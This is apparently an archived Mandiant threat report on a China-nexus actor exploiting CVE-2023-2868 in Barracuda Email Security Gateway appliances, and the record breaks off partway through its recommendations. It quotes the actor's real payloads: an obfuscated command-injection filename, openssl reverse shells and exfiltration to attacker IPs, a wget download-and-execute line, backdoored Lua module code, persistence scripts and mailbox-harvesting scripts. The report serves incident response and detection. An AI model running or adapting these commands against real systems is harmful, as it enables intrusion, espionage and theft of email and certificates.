{
	"id": "a2c7eebe-33fd-46cb-ba4a-161736616dfd",
	"created_at": "2026-04-06T00:07:30.979503Z",
	"updated_at": "2026-04-10T03:25:02.342896Z",
	"deleted_at": null,
	"sha1_hash": "3123c17f4af5bb8c4bb995066e9f0478cd6eb24e",
	"title": "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 965724,
	"plain_text": "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868)\r\nExploited Globally by Aggressive and Skilled Actor, Suspected\r\nLinks to China\r\nBy Mandiant\r\nPublished: 2023-06-15 · Archived: 2026-04-05 16:33:42 UTC\r\nWritten by: Austin Larsen, John Palmisano, Mathew Potaczek, John Wolfram, Matthew McWhirt\r\nOn May 23, 2023, Barracuda announced that a zero-day vulnerability (CVE-2023-2868) in the Barracuda Email\r\nSecurity Gateway (ESG) had been exploited in-the-wild as early as October 2022 and that they engaged Mandiant\r\nto assist in the investigation. Through the investigation, Mandiant identified a suspected China-nexus actor,\r\ncurrently tracked as UNC4841, targeting a subset of Barracuda ESG appliances to utilize as a vector for\r\nespionage, spanning a multitude of regions and sectors. Mandiant assesses with high confidence that UNC4841 is\r\nan espionage actor behind this wide-ranging campaign in support of the People’s Republic of China.\r\nStarting as early as October 10, 2022, UNC4841 sent emails (see Figure 2) to victim organizations that contained\r\nmalicious file attachments designed to exploit CVE-2023-2868 to gain initial access to vulnerable Barracuda ESG\r\nappliances. Over the course of their campaign, UNC4841 has primarily relied upon three principal code families\r\nto establish and maintain a presence on an ESG appliance, following the successful exploitation of CVE-2023-\r\n2868. These code families—SALTWATER, SEASPY, and SEASIDE—were identified in the majority of\r\nUNC4841 intrusions. As discussed in the Barracuda notice, all three code families attempt to masquerade as\r\nlegitimate Barracuda ESG modules or services, a trend that UNC4841 has continued with the newly identified\r\nmalware families detailed for the first time in this blog post.\r\nPost initial compromise, Mandiant and Barracuda observed UNC4841 aggressively target specific data of interest\r\nfor exfiltration, and in some cases, leverage access to an ESG appliance to conduct lateral movement into the\r\nvictim network, or to send mail to other victim appliances. Mandiant has also observed UNC4841 deploy\r\nadditional tooling to maintain presence on ESG appliances.\r\nOn May 19, 2023, UNC4841’s actions were first discovered by the Barracuda team and on May 21, 2023,\r\nBarracuda began releasing containment and remediation patches with the goal of eradicating UNC4841 from\r\nimpacted appliances. In response to these efforts, UNC4841 quickly altered their malware and employed\r\nadditional persistence mechanisms in an attempt to maintain their access.\r\nBetween May 22, 2023 and May 24, 2023, UNC4841 countered with high frequency operations targeting a\r\nnumber of victims located in at least 16 different countries. Overall, Mandiant identified that this campaign has\r\nimpacted organizations across the public and private sectors worldwide, with almost a third being government\r\nagencies (see Figure 5).\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 1 of 34\n\nOn June 6, 2023, Barracuda reiterated guidance recommending that all impacted Barracuda customers\r\nimmediately isolate and replace compromised appliances. In addition, Mandiant recommends further investigation\r\nand hunting within impacted networks, as the identified threat actor has demonstrated a commitment to\r\nmaintaining persistence for continued operations and has shown an ability to move laterally from the ESG\r\nappliance.\r\nThe sections that follow provide the technical details uncovered by Barracuda and Mandiant over the course of the\r\ninvestigation to include initial exploitation of the ESG appliance, the malware deployed, as well as UNC4841's\r\nshift in tactics, techniques and procedures (TTPs) in response to Barracuda’s remediation efforts. The post\r\nconcludes with Mandiant's initial assessment on attribution, and provides hardening, remediation and hunting\r\nrecommendations for organizations impacted.\r\nMandiant commends Barracuda for their decisive actions, transparency, and information sharing following the\r\nexploitation of CVE-2023-2868 by UNC4841. The response to the exploitation of this vulnerability by UNC4841\r\nand subsequent investigation necessitated collaboration between Mandiant, Barracuda, and multiple government\r\nand intelligence partners. Mandiant was enabled by expertise of Barracuda engineers who provided invaluable\r\nproduct specific knowledge as well as telemetry data from the full fleet of ESG appliances. The data provided by\r\nBarracuda enabled Mandiant to understand the full scope, investigate at scale, as well as monitor subsequent\r\nattacker activity.\r\nFigure 1: Intrusion timeline\r\nCVE-2023-2868\r\nCVE-2023-2868 is a remote command injection vulnerability present in the Barracuda Email Security Gateway\r\n(appliance form factor only) versions 5.1.3.001-9.2.0.006 that exists when screening email attachments.\r\nThe command injection vulnerability exists in the parsing logic for the processing of TAR files. The following\r\ncode within the product is the focal point of the vulnerability:\r\nqx{$tarexec -O -xf $tempdir/parts/$part '$f'};\r\nIt effectively amounts to unsanitized and unfiltered user-controlled input via the $f variable being executed as a\r\nsystem command through Perl’s qx{} routine. $f is a user-controlled variable that will contain the filenames of the\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 2 of 34\n\narchived files within a TAR. Consequently, UNC4841 was able to format TAR files in a particular manner to\r\ntrigger a command injection attack that enabled them to remotely execute system commands with the privileges of\r\nthe Email Security Gateway product.\r\nInitial Access\r\nStarting as early as October 10, 2022, UNC4841 sent emails to victim organizations that contained specially\r\ncrafted TAR file attachments designed to exploit CVE-2023-2868 to gain initial access to vulnerable Barracuda\r\nESG appliances. In initial emails, UNC4841 attached files with a \".tar\" extension in the filename, whereas in later\r\nemails they used different file extensions such as \".jpg\" or \".dat\". Regardless of file extension, the observed\r\nattachments were valid TAR files that exploited CVE-2023-2868.\r\nObserved emails contained generic email subject and body content, usually with poor grammar and in some cases\r\nstill containing placeholder values. Mandiant assesses UNC4841 likely crafted the body and subject of the\r\nmessage to appear as generic spam in order to be flagged by spam filters or dissuade security analysts from\r\nperforming a full investigation. Mandiant has observed this tactic utilized by advanced groups exploiting zero-day\r\nvulnerabilities in the past.\r\nSome examples are shown in Figure 2.\r\nFigure 2a: Email sent by UNC4841 with attachments that exploit CVE-2023-2868\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 3 of 34\n\nFigure 2b: Email sent by UNC4841 with attachments that exploit CVE-2023-2868\r\nFigure 2c: Email sent by UNC4841 with attachments that exploit CVE-2023-2868\r\nUNC4841 used several different methods to deliver their emails to targeted appliances. In some cases, UNC4841\r\nspoofed email “from” addresses that were for non-existent domains. In other cases, Mandiant observed the actor\r\nuse addresses with domains that were likely not in use or that we suspect they did not control.\r\nBased on analysis of email headers, Mandiant identified the actor sending emails from a Vultr VPS server\r\n(216.238.112[.]82). Mandiant also observed source IP addresses with no notable characteristics or history. In one\r\ncase, email headers indicated that an email originated from an IP address allocated to China Telecom\r\n(101.229.146[.]218). Additionally, Mandiant identified the use of a mail client in the x-mailer header that was\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 4 of 34\n\nfound to be low-prevalence and that we have observed in use by another China-nexus espionage actor to send\r\nphishing emails.\r\nMandiant also obtained exploit emails that indicated the actor had used email addresses that belonged to an\r\norganization that was also found to have a compromised Barracuda ESG appliance. Furthermore, UNC4841 was\r\nobserved sending emails from compromised appliances to exploit or interact with backdoored modules on other\r\ncompromised appliances. Although we do not have conclusive evidence, execution artifacts on a subset of\r\nimpacted appliances indicate that UNC4841 is using a utility named “CSmtp” that we suspect is a command line\r\nutility to send emails.\r\nNote that at the time of writing, Mandiant has only reviewed a small subset of exploit emails sent by UNC4841.\r\nAs a result, these findings may not be representative of all emails sent by the actor.\r\nReverse Shell\r\nUNC4841’s TAR file attachments exploited CVE-2023-2868 in the Barracuda ESG to execute a reverse shell\r\npayload on certain ESG appliances targeted by the actor. The malicious TAR files recovered to date have all\r\nconsisted of five archived files, four of which appear to have no significance to the execution chain and are not\r\nused in the exploit, and the first file in the archive containing the exploit payload inside its filename. Since the\r\nvulnerability exists in the parsing of this filename, the content of the archived files does not matter and has\r\nconsisted of random strings.\r\nThe exploit payload (filename) is enclosed in backticks (`) and single quotes (‘) which triggers the command\r\ninjection in the form of command substitution. An example file contained within one of the recovered TAR\r\narchives is shown as follows:\r\n'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvc\r\nGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjE0OS4xNTY6ODA4MC\r\nA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;_ech_o $abcdefg_${ee}se64\r\n-d_${G}h;wh66489.txt`'\r\nOnce deobfuscated, the payload contains the following format where the variable $abcdefg is a base64 encoded\r\nstring that is decoded and executed:\r\nabcdefg=c2V0c2lkIH…;echo $abcdefg | base64 -d | sh\r\nAn example of the base64 payload to be executed is shown as follows:\r\nsetsid sh -c \"mkfifo /tmp/p;sh -i \u003c/tmp/p 2\u003e\u00261|openssl s_client -quiet -connect\r\n107.148.149[.]156:8080 \u003e/tmp/p 2\u003e/dev/null;rm /tmp/p\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 5 of 34\n\nThis series of shell commands achieves the following actions:\r\nsetsid\r\nRuns a new session and detaches it from the terminal. This ensures that the following command\r\nkeeps running even if the terminal ends up being closed.\r\nmkfifo /tmp/p\r\nCreates a named pipe at /tmp/p that will be used as the storage to facilitate transferring the\r\ncommands from the server to be executed.\r\nsh -i \u003c/tmp/p 2\u003e\u00261\r\ncreates a new interactive (-i) shell and redirects its input from the named pipe that was just created.\r\n2\u003e\u00261 redirects the error output to the standard output.\r\nopenssl s_client -quiet -connect 107.148.149[.]156:8080 \u003e/tmp/p 2\u003e/dev/null\r\nOpenSSL is used to create a client that connects to the specified IP address and port (in this case\r\n107.148.149[.]156:8080). The -quiet option is used to suppress session and certificate information\r\noutput. The standard output of this command is redirected to the named pipe, and error output is\r\ndiscarded (2\u003e/dev/null).\r\nrm /tmp/p\r\nThis cleans up the named pipe after the OpenSSL connection is closed by removing it.\r\nMandiant also observed the actor deploy a shell script post-compromise with a similar reverse shell payload. Note\r\nthat the path of the named pipe varies, but is usually a single letter and/or number. For example /tmp/p, /tmp/p7,\r\nand /tmp/t.\r\nIn some limited cases, Mandiant also observed UNC4841 execute commands to spawn a bash shell using Python\r\nafter they had gained access:\r\npython -c import pty;pty.spawn(\"/bin/bash\")\r\nBackdoor Payloads\r\nAfter gaining access to appliances, UNC4841 executed wget commands to download secondary backdoor\r\npayloads from open directories on their servers. In some cases, UNC4841 downloaded individual malware files\r\ndirectly. In other cases, Mandiant observed the actor download TAR files that contained backdoor payloads along\r\nwith shell scripts to install and persist them. An example of a wget command to download, extract, and execute\r\nthe SALTWATER secondary payload is shown as follows:\r\nsh -c wget --no-check-certificate\r\nhttps://107.148.219[.]53:443/install_reuse/install_reuse.tar;tar -xvf\r\ninstall_reuse.tar;chmod +x update_v35.sh;./update_v35.sh\r\nThis series of shell commands achieves the following actions:\r\nwget --no-check-certificate https://107.148.219[.]53:443/install_reuse/install_reuse.tar\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 6 of 34\n\nDownloads a tar archive while ignoring SSL/TLS certificate checks\r\ntar -xvf install_reuse.tar\r\nExtracts the tar archive\r\nchmod +x update_v35.sh\r\nEnables execute permissions on the malware installer shell script\r\n./update_v35.sh\r\nExecutes the malware installer\r\nMandiant also observed UNC4841 attempt to use wget to download RAR and ZIP payloads from URLs hosted at\r\ntemp[.]sh, however, these were unsuccessful and Mandiant was unable to obtain them for analysis.\r\nOver the course of the investigation to date, Mandiant and Barracuda have identified three (3) primary backdoors\r\nin use by UNC4841: SEASPY, SALTWATER and SEASIDE.\r\nSEASPY is the primary backdoor that has been deployed by UNC4841 throughout their campaign. SEASPY is a\r\npassive backdoor that establishes itself as a PCAP filter on ports TCP/25 (SMTP) and TCP/587 and is activated by\r\na “magic packet”. Mandiant’s analysis has identified code overlap between SEASPY and cd00r, a publicly\r\navailable backdoor.\r\nEarly deployments of SEASPY, when unpacked, maintained symbols and were installed under the file name:\r\nBarracudaMailService\r\nFollowing Barracuda’s patch, Mandiant observed UNC4841 update SEASPY to strip symbols within the binary,\r\npack the malware with UPX, and use authentication when establishing a reverse shell to a command and control\r\n(C2) server. UNC4841 deployed this updated variant with the file names:\r\nresize2fstab\r\nresize_reisertab\r\nFigure 3 depicts the SEASPY critical attack path.\r\nFigure 3: SEASPY attack path\r\nSALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 7 of 34\n\nSALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling\r\ncapabilities. The backdoor is implemented using hooks on the send, recv, close syscalls via the 3rd party\r\nkubo/funchook hooking library, and amounts to five components, most of which are referred to as \"Channels\"\r\nwithin the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic\r\nbackdoor functionality. The five channels are:\r\nDownloadChannel\r\nUploadChannel\r\nProxyChannel\r\nShellChannel\r\nTunnelArgs\r\nWhen deploying SALTWATER, UNC4841 has repeatedly utilized time-stomping to further hide their malicious\r\nactivity. UNC4841 has also been observed leveraging time-stomping when deploying SEASIDE.\r\nAdditionally, between May 21, 2023 and May 22, 2023, shortly following Barracuda’s initial remediation script\r\ndeployment, UNC4841 quickly made modifications to both SEASPY and SALTWATER related components in\r\norder to prevent effective patching. Between May 22, 2023 and May 24, 2023, UNC4841 conducted high\r\nfrequency operations on a number of victims located in at least 16 different countries; modifying 7 components of\r\nSEASPY and at least 2 components of SALTWATER.\r\nSEASIDE is a Lua-based module for the Barracuda SMTP daemon (bsmtpd) that monitors SMTP HELO/EHLO\r\ncommands to receive an encoded C2 IP address and port that it decodes and passes as arguments to an external\r\nbinary (WHIRLPOOL) that establishes a reverse shell.\r\nSANDBAR is a rootkit in the form of a trojanized network file system kernel module for linux (nfsd_stub.ko) that\r\ncontains hooks to hide processes that begin with a specified name. SANDBAR hides the process ID from being\r\ndisplayed when the /proc filesystem is queried. SANDBAR hooks the \"iterate_shared\" routine of the\r\n\"file_operations\" structure for the /proc filesystem and the subsequent \"filldir\" callback to hide the process. It\r\nappears to be adapted from publicly available rootkit code.\r\nThe SANDBAR sample Mandiant analyzed was configured to hide processes starting with the name “Bar”, it is\r\nlikely this was designed to hide SEASPY malware which was deployed with the name \"BarracudaMailService\".\r\nNetwork defenders should be aware that command output or log sources for process listings may be missing\r\nprocesses for malware deployed by UNC4841 if the ESG has been infected with SANDBAR and is hiding\r\nprocesses in this manner.\r\nTrojanized LUA Modules\r\nIn addition to installing backdoors, UNC4841 trojanized several legitimate Barracuda LUA modules by inserting\r\nadditional callback logic to be executed when certain email related events are received by the appliance. A total of\r\nthree (3) trojanized modules were identified across victim sets that we track with two different malware families:\r\nSEASPRAY and SKIPJACK.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 8 of 34\n\nSEASPRAY is a launcher written in Lua that is a trojanized Barracuda email security gateway module.\r\nSEASPRAY registers an event handler for incoming email attachments. If an attachment has a filename that\r\ncontains a special value, SEASPRAY copies the file into /tmp directory and executes an external binary\r\n(WHIRLPOOL) that establishes a reverse shell with the full path as a parameter. The core modification to the Lua\r\nmodule that identifies SEASPRAY is contained in the following snippet:\r\nif string.find(attachment:filename(),'\u003cREDACTED\u003e') ~= nil then\r\n os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())\r\n os.execute('rverify'..' /tmp/'..attachment:filename())\r\nend\r\nMandiant also discovered a variant of SEASPRAY code that was inserted into a module that is responsible for\r\nimplementing sender block/accept functionality:\r\nif string.find(sender,\"\u003cREDACTED\u003e\") ~= nil then\r\n os.execute('saslautchd'..' '..sender)\r\nend\r\nWHIRLPOOL is a C based utility used to create a TLS reverse shell. WHIRLPOOL uses either a single CLI\r\nargument that is a given file path, or two arguments that are a given IP and Port. Mandiant has observed\r\nWHIRLPOOL being used alongside SEASPRAY and SEASIDE. Differing callback methods were used across\r\ndiffering victim sets. This may have been done in part to reduce their chance of being discovered or it may have\r\nbeen done to leverage existing scripts that were already in place on the system as opposed to creating new files.\r\nSKIPJACK is a passive backdoor written in Lua that is a trojanized version of a Barracuda email security gateway\r\nmodule that processes emails. SKIPJACK registers a listener for incoming email headers and subjects and\r\ndecodes and executes the content of the “Content-ID” header field. SKIPJACK consists of the following code\r\ninsertion to a listener that processes email headers (reformatted for readability):\r\nif hdr:name() == \"Content-ID\" then\r\n if hdr:body() ~= nil then\r\n if string.match(hdr:body(), \"^[%w%+/=\\r\\n]+$\") then\r\n io.popen(\"echo \" \" .. hdr:body() .. \"\" | openssl aes-256-cbc -d -A -a -nosalt -K \u003cREDACT\r\n End\r\n end\r\nend\r\nThe value of the Content-ID” field is checked against the regex \"^[%w%+/=\\r\\n]+$\" to ensure it is Base64\r\nencoded. If these conditions are met, SKIPJACK will AES decrypt the content using openssl, Base64 decode the\r\ndecrypted data, and execute it as a shell command. The openssl command sets the following flags:\r\naes-256-cbc\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 9 of 34\n\nSpecifies the encryption algorithm to be used, in this case, Advanced Encryption Standard (AES)\r\nwith a 256-bit key in Cipher Block Chaining (CBC) mode.\r\n-d\r\nIndicates that the command will perform decryption. The data provided will be decrypted using the\r\nspecified algorithm and key.\r\n-A\r\nDecodes the input from Base64 encoding before performing the decryption. The input data is\r\nexpected to be in Base64 format.\r\n-a\r\nEncodes the output in Base64 format after performing the decryption. The decrypted data will be\r\npresented in Base64 encoding.\r\n-nosalt\r\nDisables the use of a salt value. A salt is commonly used in encryption to add randomness and\r\nincrease security.\r\n-K \u003cREDACTED\u003e\r\nSpecifies the encryption key to be used. In this case, the key is provided as a hexadecimal value \"\r\n\u003cREDACTED\u003e\". The key should have a length appropriate for the chosen encryption algorithm.\r\n-iv \u003cREDACTED\u003e\r\nSpecifies the initialization vector (IV) to be used.\r\nIn summary, the OpenSSL command decrypts input data using AES-256 in CBC mode with a specific key and\r\ninitialization vector. The input is assumed to be Base64-encoded, and the output will also be Base64-encoded. The\r\ncommand does not use a salt value.\r\nCommand and Control Infrastructure\r\nInfrastructure used by UNC4841 was observed hosting default, self-signed SSL temporary certificates that are\r\nshipped on ESG appliances for setup purposes. It is likely that this was an attempt by UNC4841 to masquerade\r\ntheir reverse shell traffic as legitimate communications being performed to Barracuda infrastructure.\r\nSHA-256: 6d1d7fe5be6f1db2d7aa2af2b53ef40c2ac06954d983bb40590944c4d00b6e57\r\nSHA-1: 51f7900806f0783f09d45d5017a89322afeb3fc3\r\nMD5: be5b6b52780d35f1392f45d96beb868c\r\nSubject DN: C=US, ST=California, L=Campbell, O=Barracuda Networks, OU=Engineering,\r\nCN=Barracuda/emailAddress=sales@barracuda.com\r\nIssuer DN: C=US, ST=California, L=Campbell, O=Barracuda Networks, OU=Engineering,\r\nCN=Barracuda/emailAddress=sales@barracuda.com\r\nSerial Number: 0x2\r\nValidity Period: 2011-09-29 to 2031-09-24\r\nMandiant observed UNC4841 exfiltrate customer uploaded SSL certificates from compromised Barracuda\r\nappliances, shown as follows:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 10 of 34\n\nsh -c openssl s_client -quiet -connect 107.148.219[.]55:443 \u003c /home/product/code/config/ssl_signed_cert.pem\r\n2\u003e\u00261\r\nIn some cases Mandiant observed what appeared to be legitimate victim certificates hosted on UNC4841’s\r\ninfrastructure. It is likely that the actor had extracted these from appliances where victims had configured their\r\nown SSL certificates, which would have been located at the same path.\r\nThere were also cases where the actor had simply used a self-signed certificate generated with default values, such\r\nas the certificate shown as follows:\r\nSHA-256: 6b60c1c833979494caff32bf02391793ac85f533516367f12a1cea857bbacba7\r\nSHA-1: 0ea7adb0b54d8bada0a8dc41ef4a9b255691d1ba\r\nMD5: 683acdb559bbc7fb64431d1f579a8104\r\nSubject DN: C=XX, L=Default City, O=Default Company Ltd\r\nIssuer DN: C=XX, L=Default City, O=Default Company Ltd\r\nSerial Number: 0xf3616b5e0e362361\r\nValidity Period: 2022-11-30 to 2023-11-30\r\nIn multiple cases, UNC4841 used domains rather than IP addresses to establish their reverse shell communications\r\nfrom compromised Barracuda appliances. Through infrastructure analysis, Mandiant identified several points of\r\noverlap with infrastructure attributed to other suspected China-nexus espionage operations. Mandiant suspects that\r\nthis indicates a shared infrastructure procurement support entity rather than the same group being behind both\r\nclusters of activity. China-nexus cyber espionage operations often share tools and infrastructure, hence this\r\nobservation strengthens our assessment that UNC4841 is of a China-nexus. UNC4841 is believed to make use of\r\nparked domains that resolve to command and control IP addresses for a short period of time. This technique has\r\nbeen used by other suspected China-nexus espionage operations, but is not unique to them.\r\nPersistence Methods\r\nOver the course of the investigation, Mandiant has identified a number of ways in which UNC4841 has attempted\r\nto maintain persistence on an impacted appliance. The first attempt at maintaining persistence was through the\r\nexecution of their initial reverse shell via hourly and daily cron jobs. These cron jobs were located at the following\r\npaths:\r\n/etc/cron.hourly/core.sh\r\n/etc/cron.hourly/aacore.sh\r\n/etc/cron.hourly/appcheck.sh\r\n/etc/cron.daily/core.sh\r\n/etc/cron.daily/core_check.sh\r\nUNC4841 persistently executed SEASPY on appliance reboot through the following addition to/etc/init.d/rc:\r\n\u003cPATH_TOSEASPY\u003e eth0\r\nThe following script was leveraged to install the persistence in /etc/init.d/rc:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 11 of 34\n\necho -e '/sbin/BarracudaMailService eth0' \u003e\u003e /etc/init.d/rc\r\ncat /etc/init.d/rc\r\ntouch /etc/init.d/rc -r /etc/init.d/reboot\r\nchmod +x /sbin/BarracudaMailService\r\nsetsid sh -c \"/sbin/BarracudaMailService eth0\" \u0026\r\necho \"set the bvp ok\"\r\nrm intentbas\r\n...\r\nIn later iterations, UNC4841 maintained persistent execution of SEASPY by inserting the following command\r\ninto the update_version Perl script executed by the appliance:\r\nsystem(\"\u003cPATH_TO_SEASPY\u003e eth0\")\r\nDespite the naming of this script, it is not a component in the normal application of Barracuda ESG firmware\r\nupdates or patches.  \r\nUNC4841 also deployed the SANDBAR kernel rootkit at the following location so it would be executed on\r\nstartup:\r\n/lib/modules/4.9.17-barracuda0/kernel/net/sunrpc/nfsd_stub.ko\r\nExfiltration\r\nEvidence of data staging and exfiltration of email related data by UNC4841 was observed in a subset of impacted\r\nESG appliances. In the majority of cases, UNC4841 staged the data in .tar.gz files in the /mail/tmp/ directory and\r\nutilized a consistent file naming convention containing 3 letters corresponding to the victim organization followed\r\nby a number such as 001.\r\nOnce staged, UNC4841 leveraged openssl to exfiltrate the .tar.gz file to attacker controlled infrastructure. An\r\nexample of a command leveraged for exfiltration of the staged data can be seen as follows:\r\nsh -c openssl s_client -quiet -connect 137.175.51[.]147:443 \u003c\r\n/mail/tmp/\u003cREDACTED\u003e.tar.gz 2\u003e\u00261\r\nIn addition, on a limited number of Email Security Gateway (ESG) appliances, Mandiant recovered shell scripts\r\nutilized by UNC4841 that conducted searches of the “mstore” for emails matching specific users or email domains\r\nand then staged the results for exfiltration. The “mstore” is the location in which email messages are temporarily\r\nstored on the appliance. This activity differs from other email collection activities by UNC4841 as it represents\r\ntargeted collection of email data based on specific individuals or organizations. The targets identified at the\r\naccount level included well known academics in Taiwan and Hong Kong as well as Asian and European\r\ngovernment officials in Southeast Asia.\r\nThe following script, 1.sh, was leveraged to search the “mstore” and stage user email for exfiltration:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 12 of 34\n\npath=\"/mail/mstore/\"\r\nincludeContentKeyword=\"\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\\|@\u003cREDACTED\u003e\\|\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\\|\u003cREDACTED\u003e@\r\nexcludeFileNameKeyword=\"*.log\"\r\nfind ${path} -type f ! -name $excludeFileNameKeyword | while read line ;\r\ndo\r\nresult=`head -20 ${line} | grep $includeContentKeyword`\r\nif [ -n \"$result\" ]\r\nthen\r\necho ${line} \u003e\u003e tmplist\r\nfi\r\ndone\r\ntar -T /mail/mstore/tmplist -czvf /mail/mstore/tmp.tar.gz\r\nThe following script, start.sh, was another script leveraged by the actor: \r\n#!/bin/bash\r\n \r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\n mkdir /usr/share/.uc/\u003cREDACTED\u003e\r\n grep -lrn '\u003cREDACTED\u003e@' /mail/mstore | xargs -i cp {} /usr/share/.uc/\u003cREDACTED\u003e\r\nIn a limited number of cases, Mandiant observed UNC4841 utilize the anonfiles file sharing service as a means of\r\nexfiltration.\r\nLateral Movement\r\nUNC4841 was observed conducting reconnaissance activity in a small number of cases. In these cases, the actor\r\nutilized open-source tools such as fscan to the ESG for host detection, port scanning, web fingerprint\r\nidentification, web vulnerability scanning, domain control identification, and other functions. The following figure\r\nshows an example output from the fscan tool. In one environment, the actor scanned over 50 subnets over the\r\ncourse of nine days with approximately 80% of these being completed in one day.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 13 of 34\n\n\u003credacted\u003e::25 open\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:443 open\r\n[*] NetInfo:\r\n[*]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n [-\u003e]\u003credacted\u003e\r\n[*] WebTitle: https://\u003credacted\u003e code:200 len:701 title:IIS Windows Server\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:443 open\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 65\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 26\r\n[*] LiveTop \u003credacted\u003e/16 段存活数量为: 13\r\n\u003credacted\u003e:25 open\r\n\u003credacted\u003e:587 open\r\n\u003credacted\u003e:53 open\r\n\u003credacted\u003e:389 open\r\nTargeting\r\nTargeted organizations have spanned public and private sectors worldwide. A majority of exploitation activity\r\nappears to impact the Americas; however, that may partially reflect the product’s customer base (Figure 4).\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 14 of 34\n\nFigure 4: Affected organizations by region\r\nAlmost a third of identified affected organizations were government agencies (Figure 5), supporting the\r\nassessment that the campaign had an espionage motivation. Further, in the set of entities selected for focused data\r\nexfiltration, shell scripts were uncovered that targeted email domains and users from ASEAN Ministry of Foreign\r\nAffairs (MFAs), as well as foreign trade offices and academic research organizations in Taiwan and Hong Kong.\r\nIn addition, the actors searched for email accounts belonging to individuals working for a government with\r\npolitical or strategic interest to the PRC at the same time that this victim government was participating in high-level, diplomatic meetings with other countries.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 15 of 34\n\nFigure 5: Government agencies worldwide appear to have been disproportionately targeted\r\nBased on the evidence available at the time of analysis, earliest compromises appear to have occurred on a small\r\nsubset of appliances geo-located to mainland China. The C2 communications utilized during this early set of\r\ncompromises also leveraged port 8080 while later compromises that occurred globally almost entirely leveraged\r\nport- 443 or port 25.\r\nAttribution \r\nMandiant assesses with high confidence that UNC4841 conducted espionage activity in support of the People’s\r\nRepublic of China. While Mandiant has not attributed this activity to a previously known threat group at this time,\r\nwe have identified several infrastructure and malware code overlaps that provide us with a high degree of\r\nconfidence that this is a China-nexus espionage operation. Additionally, the targeting, both at the organizational\r\nand individual account levels, focused on issues that are high policy priorities for the PRC, particularly in the Asia\r\nPacific region including Taiwan. \r\nOutlook and Implications\r\nUNC4841 has shown to be highly responsive to defensive efforts and actively modifies TTPs to maintain their\r\noperations. Mandiant strongly recommends impacted Barracuda customers continue to hunt for this actor and\r\ninvestigate affected networks. We expect UNC4841 will continue to alter their TTPs and modify their toolkit,\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 16 of 34\n\nespecially as network defenders continue to take action against this adversary and their activity is further exposed\r\nby the infosec community. Recommendations and detection rules are provided in following sections.\r\nRecommendations \r\nIn alignment with Barracuda’s guidance released on May 31, 2023, Mandiant recommends immediate replacement\r\nof compromised ESG appliances, regardless of patch level. Additional guidance for replacing an impacted\r\nappliance can be found on Barracuda’s Trust Center.\r\nIn addition, Mandiant recommends all impacted organizations perform an investigation and hunting activities\r\nwithin their networks. An investigation may include, but is not limited to the following:\r\nSweep the impacted environment for all IOCs provided by both Mandiant and Barracuda.\r\nReview email logs to identify the initial point of exposure.\r\nRevoke and rotate all domain-based and local credentials that were on the ESG at the time of compromise.\r\nRevoke and reissue all certificates that were on the ESG at the time of compromise.\r\nMonitor the entire environment for the use of credentials that were on the ESG at time of compromise.\r\nMonitor the entire environment for use of certificates that were on the ESG at time of compromise.\r\nReview network logs for signs of data exfiltration and lateral movement.\r\nCapture a forensic image of the appliance and conduct a forensic 